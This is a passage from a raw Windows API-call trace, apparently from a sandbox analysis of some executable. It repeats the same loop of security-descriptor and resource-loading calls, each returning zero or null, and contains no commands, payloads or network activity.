ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.015] LockResource (hResData=0x0) returned 0x0 [0220.015] FreeResource (hResData=0x0) returned 0 [0220.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.016] FreeResource (hResData=0x0) returned 0 [0220.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.016] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.017] FreeResource (hResData=0x0) returned 0 [0220.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.017] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.018] LockResource (hResData=0x0) returned 0x0 [0220.018] FreeResource (hResData=0x0) returned 0 [0220.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.019] LockResource (hResData=0x0) returned 0x0 [0220.019] FreeResource (hResData=0x0) returned 0 [0220.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.020] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.020] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.020] LockResource (hResData=0x0) returned 0x0 [0220.020] FreeResource (hResData=0x0) returned 0 [0220.020] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.020] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.021] LockResource (hResData=0x0) returned 0x0 [0220.021] FreeResource (hResData=0x0) returned 0 [0220.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.021] LockResource (hResData=0x0) returned 0x0 [0220.021] FreeResource (hResData=0x0) returned 0 [0220.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.021] LockResource (hResData=0x0) returned 0x0 [0220.021] FreeResource (hResData=0x0) returned 0 [0220.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.021] LockResource (hResData=0x0) returned 0x0 [0220.021] FreeResource (hResData=0x0) returned 0 [0220.021] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.021] LockResource (hResData=0x0) returned 0x0 [0220.021] FreeResource (hResData=0x0) returned 0 [0220.021] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.021] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.021] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.021] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.021] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.022] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.022] LockResource (hResData=0x0) returned 0x0 [0220.022] FreeResource (hResData=0x0) returned 0 [0220.022] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.022] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, 